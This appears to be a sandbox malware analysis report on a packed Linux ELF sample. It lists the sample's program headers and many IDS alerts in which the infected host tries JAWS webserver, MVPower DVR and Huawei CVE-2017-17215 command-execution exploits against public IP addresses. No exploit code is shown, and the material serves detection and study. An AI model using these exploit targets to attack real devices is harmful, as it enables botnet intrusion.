                                                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                            LOAD0x00x80480000x80480000x7fe80x7fe87.88960x5R E0x1000
                                                            LOAD0x00x80500000x80500000x00xa9400.00000x6RW 0x1000
                                                            GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                            192.168.2.23176.56.236.5856236802030092 01/26/24-15:32:30.860397TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5623680192.168.2.23176.56.236.58
                                                            192.168.2.23176.97.247.24847918802025883 01/26/24-15:32:44.957952TCP2025883ET EXPLOIT MVPower DVR Shell UCE4791880192.168.2.23176.97.247.248
                                                            192.168.2.2318.160.226.10542168802030092 01/26/24-15:31:58.618951TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4216880192.168.2.2318.160.226.105
                                                            192.168.2.2323.14.115.11547294802025883 01/26/24-15:32:41.743983TCP2025883ET EXPLOIT MVPower DVR Shell UCE4729480192.168.2.2323.14.115.115
                                                            192.168.2.2389.41.249.20560208802030092 01/26/24-15:32:44.750284TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6020880192.168.2.2389.41.249.205
                                                            192.168.2.231.232.247.1541192802030092 01/26/24-15:32:50.921301TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4119280192.168.2.231.232.247.15
                                                            192.168.2.2374.126.94.2437582802030092 01/26/24-15:31:51.555751TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3758280192.168.2.2374.126.94.24
                                                            192.168.2.23184.51.104.1756314802025883 01/26/24-15:32:07.796229TCP2025883ET EXPLOIT MVPower DVR Shell UCE5631480192.168.2.23184.51.104.17
                                                            192.168.2.2345.157.202.2638098802025883 01/26/24-15:31:43.792134TCP2025883ET EXPLOIT MVPower DVR Shell UCE3809880192.168.2.2345.157.202.26
                                                            192.168.2.2366.228.56.19641006802025883 01/26/24-15:32:49.930063TCP2025883ET EXPLOIT MVPower DVR Shell UCE4100680192.168.2.2366.228.56.196
                                                            192.168.2.2320.71.11.13052724802025883 01/26/24-15:31:52.747621TCP2025883ET EXPLOIT MVPower DVR Shell UCE5272480192.168.2.2320.71.11.130
                                                            192.168.2.23206.189.92.21646586802030092 01/26/24-15:31:15.731033TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4658680192.168.2.23206.189.92.216
                                                            192.168.2.23107.170.192.17952012802025883 01/26/24-15:31:30.586907TCP2025883ET EXPLOIT MVPower DVR Shell UCE5201280192.168.2.23107.170.192.179
                                                            192.168.2.23104.20.25.840230802030092 01/26/24-15:32:01.591473TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4023080192.168.2.23104.20.25.8
                                                            192.168.2.23183.90.233.9447038802030092 01/26/24-15:32:28.468365TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4703880192.168.2.23183.90.233.94
                                                            192.168.2.23139.9.139.4446194802030092 01/26/24-15:31:53.004488TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4619480192.168.2.23139.9.139.44
                                                            192.168.2.23217.255.164.2052728802030092 01/26/24-15:32:41.969791TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5272880192.168.2.23217.255.164.20
                                                            192.168.2.2367.205.162.9947936802025883 01/26/24-15:31:27.619334TCP2025883ET EXPLOIT MVPower DVR Shell UCE4793680192.168.2.2367.205.162.99
                                                            192.168.2.23185.203.117.8648890802030092 01/26/24-15:32:09.635936TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4889080192.168.2.23185.203.117.86
                                                            192.168.2.23107.148.114.6555240802025883 01/26/24-15:31:18.915143TCP2025883ET EXPLOIT MVPower DVR Shell UCE5524080192.168.2.23107.148.114.65
                                                            192.168.2.23186.39.102.20842590802030092 01/26/24-15:32:18.363395TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4259080192.168.2.23186.39.102.208
                                                            192.168.2.2393.193.221.12535076802030092 01/26/24-15:32:19.779362TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3507680192.168.2.2393.193.221.125
                                                            192.168.2.23196.51.30.12260800802030092 01/26/24-15:31:32.888328TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6080080192.168.2.23196.51.30.122
                                                            192.168.2.2347.246.10.10051612802025883 01/26/24-15:32:19.110765TCP2025883ET EXPLOIT MVPower DVR Shell UCE5161280192.168.2.2347.246.10.100
                                                            192.168.2.23174.141.213.15253818802030092 01/26/24-15:32:28.539246TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5381880192.168.2.23174.141.213.152
                                                            192.168.2.2351.103.222.22957252802025883 01/26/24-15:31:47.419000TCP2025883ET EXPLOIT MVPower DVR Shell UCE5725280192.168.2.2351.103.222.229
                                                            192.168.2.23212.23.145.11457594802030092 01/26/24-15:32:21.797565TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5759480192.168.2.23212.23.145.114
                                                            192.168.2.2345.221.114.7953168802025883 01/26/24-15:32:35.546806TCP2025883ET EXPLOIT MVPower DVR Shell UCE5316880192.168.2.2345.221.114.79
                                                            192.168.2.2345.201.221.1256156802025883 01/26/24-15:31:27.778518TCP2025883ET EXPLOIT MVPower DVR Shell UCE5615680192.168.2.2345.201.221.12
                                                            192.168.2.23159.223.194.13638908802025883 01/26/24-15:31:49.498703TCP2025883ET EXPLOIT MVPower DVR Shell UCE3890880192.168.2.23159.223.194.136
                                                            192.168.2.23104.232.77.8253902802030092 01/26/24-15:32:07.652853TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5390280192.168.2.23104.232.77.82
                                                            192.168.2.2335.171.5.19058752802030092 01/26/24-15:32:28.234297TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5875280192.168.2.2335.171.5.190
                                                            192.168.2.23117.51.135.2356360802025883 01/26/24-15:31:27.355741TCP2025883ET EXPLOIT MVPower DVR Shell UCE5636080192.168.2.23117.51.135.23
                                                            192.168.2.2323.77.215.3954978802025883 01/26/24-15:31:33.317181TCP2025883ET EXPLOIT MVPower DVR Shell UCE5497880192.168.2.2323.77.215.39
                                                            192.168.2.23185.92.244.18134746802030092 01/26/24-15:31:36.457097TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3474680192.168.2.23185.92.244.181
                                                            192.168.2.23156.250.15.7359550802025883 01/26/24-15:31:28.086609TCP2025883ET EXPLOIT MVPower DVR Shell UCE5955080192.168.2.23156.250.15.73
                                                            192.168.2.23104.101.158.18648658802030092 01/26/24-15:32:23.736327TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4865880192.168.2.23104.101.158.186
                                                            192.168.2.23222.99.0.240348802025883 01/26/24-15:31:23.586367TCP2025883ET EXPLOIT MVPower DVR Shell UCE4034880192.168.2.23222.99.0.2
                                                            192.168.2.23104.25.117.18253608802030092 01/26/24-15:32:25.541472TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5360880192.168.2.23104.25.117.182
                                                            192.168.2.23108.186.223.7460054802030092 01/26/24-15:31:15.563497TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6005480192.168.2.23108.186.223.74
                                                            192.168.2.2350.62.222.15055564802030092 01/26/24-15:31:49.642387TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5556480192.168.2.2350.62.222.150
                                                            192.168.2.2365.0.126.4658778802030092 01/26/24-15:32:07.167336TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5877880192.168.2.2365.0.126.46
                                                            192.168.2.23178.68.44.8346740802025883 01/26/24-15:31:01.295766TCP2025883ET EXPLOIT MVPower DVR Shell UCE4674080192.168.2.23178.68.44.83
                                                            192.168.2.2395.101.219.23744662802025883 01/26/24-15:32:50.045255TCP2025883ET EXPLOIT MVPower DVR Shell UCE4466280192.168.2.2395.101.219.237
                                                            192.168.2.2388.221.30.22749674802025883 01/26/24-15:32:47.925102TCP2025883ET EXPLOIT MVPower DVR Shell UCE4967480192.168.2.2388.221.30.227
                                                            192.168.2.2324.225.30.2246538802030092 01/26/24-15:33:00.621045TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4653880192.168.2.2324.225.30.22
                                                            192.168.2.23156.254.90.17758848372152835222 01/26/24-15:31:13.283422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5884837215192.168.2.23156.254.90.177
                                                            192.168.2.2352.109.60.2139194802025883 01/26/24-15:32:25.609180TCP2025883ET EXPLOIT MVPower DVR Shell UCE3919480192.168.2.2352.109.60.21
                                                            192.168.2.2323.20.38.150340802025883 01/26/24-15:31:35.517957TCP2025883ET EXPLOIT MVPower DVR Shell UCE5034080192.168.2.2323.20.38.1
                                                            192.168.2.23111.51.104.23142970802030092 01/26/24-15:32:25.685688TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4297080192.168.2.23111.51.104.231
                                                            192.168.2.2323.46.227.11555366802030092 01/26/24-15:32:50.641050TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5536680192.168.2.2323.46.227.115
                                                            192.168.2.232.21.165.21938134802030092 01/26/24-15:31:12.259896TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3813480192.168.2.232.21.165.219
                                                            192.168.2.23153.121.71.21649318802025883 01/26/24-15:32:48.060193TCP2025883ET EXPLOIT MVPower DVR Shell UCE4931880192.168.2.23153.121.71.216
                                                            192.168.2.2341.44.41.6749362372152835222 01/26/24-15:31:52.468921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4936237215192.168.2.2341.44.41.67
                                                            192.168.2.2320.4.150.15357706802025883 01/26/24-15:32:01.649352TCP2025883ET EXPLOIT MVPower DVR Shell UCE5770680192.168.2.2320.4.150.153
                                                            192.168.2.23156.244.93.14353284802030092 01/26/24-15:31:47.591942TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5328480192.168.2.23156.244.93.143
                                                            192.168.2.2366.39.97.3749688802025883 01/26/24-15:32:18.363066TCP2025883ET EXPLOIT MVPower DVR Shell UCE4968880192.168.2.2366.39.97.37
                                                            192.168.2.23143.244.211.11039042802030092 01/26/24-15:32:42.632872TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3904280192.168.2.23143.244.211.110
                                                            192.168.2.23160.124.34.10244892802030092 01/26/24-15:32:23.676383TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4489280192.168.2.23160.124.34.102
                                                            192.168.2.2372.246.165.14152866802025883 01/26/24-15:32:53.456854TCP2025883ET EXPLOIT MVPower DVR Shell UCE5286680192.168.2.2372.246.165.141
                                                            192.168.2.23117.215.83.25541036802030092 01/26/24-15:31:52.153014TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4103680192.168.2.23117.215.83.255
                                                            192.168.2.2323.33.209.7442186802030092 01/26/24-15:31:33.844677TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4218680192.168.2.2323.33.209.74
                                                            192.168.2.23108.156.238.15959868802030092 01/26/24-15:32:18.244719TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5986880192.168.2.23108.156.238.159
                                                            192.168.2.23156.254.87.6340596372152829579 01/26/24-15:32:52.520635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4059637215192.168.2.23156.254.87.63
                                                            192.168.2.2323.43.226.25339442802025883 01/26/24-15:32:58.799927TCP2025883ET EXPLOIT MVPower DVR Shell UCE3944280192.168.2.2323.43.226.253
                                                            192.168.2.2320.157.170.4946164802025883 01/26/24-15:31:18.152180TCP2025883ET EXPLOIT MVPower DVR Shell UCE4616480192.168.2.2320.157.170.49
                                                            192.168.2.23101.33.8.22849264802030092 01/26/24-15:32:14.795065TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4926480192.168.2.23101.33.8.228
                                                            192.168.2.2394.137.77.16234182802025883 01/26/24-15:32:30.876888TCP2025883ET EXPLOIT MVPower DVR Shell UCE3418280192.168.2.2394.137.77.162
                                                            192.168.2.23185.32.126.3250944802030092 01/26/24-15:31:47.670538TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5094480192.168.2.23185.32.126.32
                                                            192.168.2.2323.52.181.2843186802025883 01/26/24-15:31:49.542653TCP2025883ET EXPLOIT MVPower DVR Shell UCE4318680192.168.2.2323.52.181.28
                                                            192.168.2.2346.232.249.23334358802025883 01/26/24-15:31:58.828965TCP2025883ET EXPLOIT MVPower DVR Shell UCE3435880192.168.2.2346.232.249.233
                                                            192.168.2.23119.63.71.3550196802025883 01/26/24-15:31:33.480876TCP2025883ET EXPLOIT MVPower DVR Shell UCE5019680192.168.2.23119.63.71.35
                                                            192.168.2.23123.136.83.1046740802030092 01/26/24-15:31:47.683671TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4674080192.168.2.23123.136.83.10
                                                            192.168.2.2344.228.83.2351596802025883 01/26/24-15:31:36.754031TCP2025883ET EXPLOIT MVPower DVR Shell UCE5159680192.168.2.2344.228.83.23
                                                            192.168.2.23197.246.45.20139650372152829579 01/26/24-15:32:01.755054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3965037215192.168.2.23197.246.45.201
                                                            192.168.2.2323.213.247.10141460802025883 01/26/24-15:32:18.461409TCP2025883ET EXPLOIT MVPower DVR Shell UCE4146080192.168.2.2323.213.247.101
                                                            192.168.2.23104.25.138.5739522802030092 01/26/24-15:31:52.670365TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3952280192.168.2.23104.25.138.57
                                                            192.168.2.23142.166.236.25140872802025883 01/26/24-15:32:42.618573TCP2025883ET EXPLOIT MVPower DVR Shell UCE4087280192.168.2.23142.166.236.251
                                                            192.168.2.2318.163.142.12346612802025883 01/26/24-15:33:01.661822TCP2025883ET EXPLOIT MVPower DVR Shell UCE4661280192.168.2.2318.163.142.123
                                                            192.168.2.2366.77.110.7250552802030092 01/26/24-15:32:32.488738TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5055280192.168.2.2366.77.110.72
                                                            192.168.2.23222.236.125.13744992802025883 01/26/24-15:31:44.173874TCP2025883ET EXPLOIT MVPower DVR Shell UCE4499280192.168.2.23222.236.125.137
                                                            192.168.2.23195.42.149.6560862802025883 01/26/24-15:32:21.792089TCP2025883ET EXPLOIT MVPower DVR Shell UCE6086280192.168.2.23195.42.149.65
                                                            192.168.2.2313.249.109.20043456802030092 01/26/24-15:32:58.550474TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4345680192.168.2.2313.249.109.200
                                                            192.168.2.23138.2.243.10434394802025883 01/26/24-15:32:32.597404TCP2025883ET EXPLOIT MVPower DVR Shell UCE3439480192.168.2.23138.2.243.104
                                                            192.168.2.2323.32.96.459814802030092 01/26/24-15:32:12.871882TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5981480192.168.2.2323.32.96.4
                                                            192.168.2.2349.40.48.5248506802030092 01/26/24-15:31:27.006278TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4850680192.168.2.2349.40.48.52
                                                            192.168.2.23217.243.251.11134724802030092 01/26/24-15:32:21.810147TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3472480192.168.2.23217.243.251.111
                                                            192.168.2.23130.237.20.5237106802025883 01/26/24-15:31:30.884005TCP2025883ET EXPLOIT MVPower DVR Shell UCE3710680192.168.2.23130.237.20.52
                                                            192.168.2.2318.118.223.18155768802030092 01/26/24-15:31:35.676752TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5576880192.168.2.2318.118.223.181
                                                            192.168.2.23199.119.73.2160650802030092 01/26/24-15:32:21.518956TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6065080192.168.2.23199.119.73.21
                                                            192.168.2.23191.82.36.1150732802030092 01/26/24-15:32:53.548901TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5073280192.168.2.23191.82.36.11
                                                            192.168.2.23197.234.61.13656368372152829579 01/26/24-15:32:26.903685TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5636837215192.168.2.23197.234.61.136
                                                            192.168.2.23197.246.45.20139758372152829579 01/26/24-15:32:04.352629TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3975837215192.168.2.23197.246.45.201
                                                            192.168.2.2386.69.202.2657092802030092 01/26/24-15:32:25.701483TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5709280192.168.2.2386.69.202.26
                                                            192.168.2.2318.180.111.20454250802030092 01/26/24-15:32:18.971768TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5425080192.168.2.2318.180.111.204
                                                            192.168.2.23121.29.56.20453294802030092 01/26/24-15:31:35.873163TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5329480192.168.2.23121.29.56.204
                                                            192.168.2.23100.27.4.9836268802030092 01/26/24-15:32:12.669266TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3626880192.168.2.23100.27.4.98
                                                            192.168.2.23172.65.16.15349056802030092 01/26/24-15:31:58.620312TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4905680192.168.2.23172.65.16.153
                                                            192.168.2.23204.54.40.18351026802025883 01/26/24-15:32:37.342241TCP2025883ET EXPLOIT MVPower DVR Shell UCE5102680192.168.2.23204.54.40.183
                                                            192.168.2.2323.42.153.20256544802025883 01/26/24-15:32:53.498891TCP2025883ET EXPLOIT MVPower DVR Shell UCE5654480192.168.2.2323.42.153.202
                                                            192.168.2.23120.53.232.13745522802025883 01/26/24-15:32:21.724705TCP2025883ET EXPLOIT MVPower DVR Shell UCE4552280192.168.2.23120.53.232.137
                                                            192.168.2.23175.178.225.17141804802030092 01/26/24-15:32:40.067308TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4180480192.168.2.23175.178.225.171
                                                            192.168.2.23154.38.87.5660742802030092 01/26/24-15:31:18.937002TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6074280192.168.2.23154.38.87.56
                                                            192.168.2.2345.120.178.15140836802025883 01/26/24-15:32:50.723140TCP2025883ET EXPLOIT MVPower DVR Shell UCE4083680192.168.2.2345.120.178.151
                                                            192.168.2.2347.107.144.24648474802025883 01/26/24-15:31:30.798057TCP2025883ET EXPLOIT MVPower DVR Shell UCE4847480192.168.2.2347.107.144.246
                                                            192.168.2.2369.192.228.13047616802030092 01/26/24-15:32:28.904791TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4761680192.168.2.2369.192.228.130
                                                            192.168.2.23168.76.87.954362802030092 01/26/24-15:31:37.382339TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5436280192.168.2.23168.76.87.9
                                                            192.168.2.23119.45.129.20653062802025883 01/26/24-15:32:23.703500TCP2025883ET EXPLOIT MVPower DVR Shell UCE5306280192.168.2.23119.45.129.206
                                                            192.168.2.23187.192.184.22845978802030092 01/26/24-15:32:18.308942TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4597880192.168.2.23187.192.184.228
                                                            192.168.2.23198.48.58.4137276802030092 01/26/24-15:32:44.634580TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3727680192.168.2.23198.48.58.41
                                                            192.168.2.23103.68.30.18244318802030092 01/26/24-15:31:44.329313TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4431880192.168.2.23103.68.30.182
                                                            192.168.2.23134.65.235.16534716802025883 01/26/24-15:32:23.607670TCP2025883ET EXPLOIT MVPower DVR Shell UCE3471680192.168.2.23134.65.235.165
                                                            192.168.2.2335.177.178.23848922802030092 01/26/24-15:31:52.755301TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4892280192.168.2.2335.177.178.238
                                                            192.168.2.2338.238.84.5248178802025883 01/26/24-15:32:08.099021TCP2025883ET EXPLOIT MVPower DVR Shell UCE4817880192.168.2.2338.238.84.52
                                                            192.168.2.23192.234.37.10551726802025883 01/26/24-15:32:41.768808TCP2025883ET EXPLOIT MVPower DVR Shell UCE5172680192.168.2.23192.234.37.105
                                                            192.168.2.2323.72.37.3652384802025883 01/26/24-15:32:44.709070TCP2025883ET EXPLOIT MVPower DVR Shell UCE5238480192.168.2.2323.72.37.36
                                                            192.168.2.23205.196.223.11843828802025883 01/26/24-15:31:47.595461TCP2025883ET EXPLOIT MVPower DVR Shell UCE4382880192.168.2.23205.196.223.118
                                                            192.168.2.2370.122.67.9741000802030092 01/26/24-15:33:00.440639TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4100080192.168.2.2370.122.67.97
                                                            192.168.2.2323.50.76.15939824802025883 01/26/24-15:31:35.677291TCP2025883ET EXPLOIT MVPower DVR Shell UCE3982480192.168.2.2323.50.76.159
                                                            192.168.2.23185.128.234.233140802030092 01/26/24-15:31:41.689715TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3314080192.168.2.23185.128.234.2
                                                            192.168.2.2318.65.143.7146658802025883 01/26/24-15:31:58.566964TCP2025883ET EXPLOIT MVPower DVR Shell UCE4665880192.168.2.2318.65.143.71
                                                            192.168.2.23156.241.113.2943492372152829579 01/26/24-15:31:35.972751TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4349237215192.168.2.23156.241.113.29
                                                            192.168.2.23106.252.219.2838206802025883 01/26/24-15:31:54.023823TCP2025883ET EXPLOIT MVPower DVR Shell UCE3820680192.168.2.23106.252.219.28
                                                            192.168.2.23125.56.205.13542420802030092 01/26/24-15:32:21.670698TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4242080192.168.2.23125.56.205.135
                                                            192.168.2.23197.246.107.15135100372152829579 01/26/24-15:32:53.792661TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3510037215192.168.2.23197.246.107.151
                                                            192.168.2.2346.23.188.5536380802030092 01/26/24-15:31:13.988644TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3638080192.168.2.2346.23.188.55
                                                            192.168.2.2338.59.4.25037470802025883 01/26/24-15:31:30.832217TCP2025883ET EXPLOIT MVPower DVR Shell UCE3747080192.168.2.2338.59.4.250
                                                            192.168.2.2338.165.19.5959722802030092 01/26/24-15:31:52.717870TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5972280192.168.2.2338.165.19.59
                                                            192.168.2.2313.113.68.2940470802030092 01/26/24-15:31:58.895992TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4047080192.168.2.2313.113.68.29
                                                            192.168.2.2393.63.84.18940706802025883 01/26/24-15:32:21.603095TCP2025883ET EXPLOIT MVPower DVR Shell UCE4070680192.168.2.2393.63.84.189
                                                            192.168.2.23168.76.22.16955064802030092 01/26/24-15:31:22.829928TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5506480192.168.2.23168.76.22.169
                                                            192.168.2.23106.52.149.2557494802025883 01/26/24-15:32:14.899767TCP2025883ET EXPLOIT MVPower DVR Shell UCE5749480192.168.2.23106.52.149.25
                                                            192.168.2.2375.101.206.19358582802025883 01/26/24-15:32:21.492792TCP2025883ET EXPLOIT MVPower DVR Shell UCE5858280192.168.2.2375.101.206.193
                                                            192.168.2.2378.187.235.23659344802030092 01/26/24-15:32:32.918898TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5934480192.168.2.2378.187.235.236
                                                            192.168.2.2343.140.243.5641060802030092 01/26/24-15:31:14.053818TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4106080192.168.2.2343.140.243.56
                                                            192.168.2.2352.85.131.24559562802030092 01/26/24-15:31:47.589436TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5956280192.168.2.2352.85.131.245
                                                            192.168.2.2381.150.7.20744056802030092 01/26/24-15:32:23.587676TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4405680192.168.2.2381.150.7.207
                                                            192.168.2.2334.107.144.17433424802030092 01/26/24-15:31:37.805934TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3342480192.168.2.2334.107.144.174
                                                            192.168.2.232.20.93.937890802025883 01/26/24-15:31:58.816455TCP2025883ET EXPLOIT MVPower DVR Shell UCE3789080192.168.2.232.20.93.9
                                                            192.168.2.2369.135.54.10636628802030092 01/26/24-15:32:11.581498TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3662880192.168.2.2369.135.54.106
                                                            192.168.2.23134.236.63.4959052802030092 01/26/24-15:32:12.175744TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5905280192.168.2.23134.236.63.49
                                                            192.168.2.23138.188.47.4645194802030092 01/26/24-15:32:39.889155TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4519480192.168.2.23138.188.47.46
                                                            192.168.2.23212.183.29.5340702802025883 01/26/24-15:32:47.917862TCP2025883ET EXPLOIT MVPower DVR Shell UCE4070280192.168.2.23212.183.29.53
                                                            192.168.2.2352.196.131.23246070802025883 01/26/24-15:31:13.014919TCP2025883ET EXPLOIT MVPower DVR Shell UCE4607080192.168.2.2352.196.131.232
                                                            192.168.2.23104.79.247.5443910802030092 01/26/24-15:32:23.572724TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4391080192.168.2.23104.79.247.54
                                                            192.168.2.23120.24.228.4457014802030092 01/26/24-15:32:46.097536TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5701480192.168.2.23120.24.228.44
                                                            192.168.2.23152.0.21.13756240802025883 01/26/24-15:31:31.568754TCP2025883ET EXPLOIT MVPower DVR Shell UCE5624080192.168.2.23152.0.21.137
                                                            192.168.2.23148.251.126.8558662802025883 01/26/24-15:32:21.791036TCP2025883ET EXPLOIT MVPower DVR Shell UCE5866280192.168.2.23148.251.126.85
                                                            192.168.2.2334.111.133.23858894802025883 01/26/24-15:32:56.725398TCP2025883ET EXPLOIT MVPower DVR Shell UCE5889480192.168.2.2334.111.133.238
                                                            192.168.2.23134.209.129.20445966802025883 01/26/24-15:31:26.756022TCP2025883ET EXPLOIT MVPower DVR Shell UCE4596680192.168.2.23134.209.129.204
                                                            192.168.2.238.209.240.1343058802030092 01/26/24-15:31:18.206989TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4305880192.168.2.238.209.240.13
                                                            192.168.2.23173.194.223.12051554802030092 01/26/24-15:31:01.075466TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5155480192.168.2.23173.194.223.120
                                                            192.168.2.2345.14.166.544134802025883 01/26/24-15:32:58.853882TCP2025883ET EXPLOIT MVPower DVR Shell UCE4413480192.168.2.2345.14.166.5
                                                            192.168.2.23156.241.109.11940828372152829579 01/26/24-15:32:18.664967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4082837215192.168.2.23156.241.109.119
                                                            192.168.2.23103.151.120.21040842802030092 01/26/24-15:32:33.084081TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4084280192.168.2.23103.151.120.210
                                                            192.168.2.2393.184.250.233602802030092 01/26/24-15:32:56.621551TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3360280192.168.2.2393.184.250.2
                                                            192.168.2.23198.57.211.4834030802030092 01/26/24-15:32:56.773866TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3403080192.168.2.23198.57.211.48
                                                            192.168.2.2379.132.142.4560932802030092 01/26/24-15:31:04.250547TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6093280192.168.2.2379.132.142.45
                                                            192.168.2.23197.188.167.5936186802025883 01/26/24-15:31:23.180588TCP2025883ET EXPLOIT MVPower DVR Shell UCE3618680192.168.2.23197.188.167.59
                                                            192.168.2.235.253.0.5242830802030092 01/26/24-15:32:44.946639TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4283080192.168.2.235.253.0.52
                                                            192.168.2.2383.240.212.19446456802025883 01/26/24-15:32:21.868639TCP2025883ET EXPLOIT MVPower DVR Shell UCE4645680192.168.2.2383.240.212.194
                                                            192.168.2.23213.183.59.24454690802030092 01/26/24-15:32:21.865408TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5469080192.168.2.23213.183.59.244
                                                            192.168.2.2338.177.201.847482802025883 01/26/24-15:32:30.581668TCP2025883ET EXPLOIT MVPower DVR Shell UCE4748280192.168.2.2338.177.201.8
                                                            192.168.2.2352.163.56.3434990802025883 01/26/24-15:32:24.018002TCP2025883ET EXPLOIT MVPower DVR Shell UCE3499080192.168.2.2352.163.56.34
                                                            192.168.2.23159.69.144.11053778802025883 01/26/24-15:32:48.799773TCP2025883ET EXPLOIT MVPower DVR Shell UCE5377880192.168.2.23159.69.144.110
                                                            192.168.2.23198.46.203.3945072802030092 01/26/24-15:32:47.575690TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4507280192.168.2.23198.46.203.39
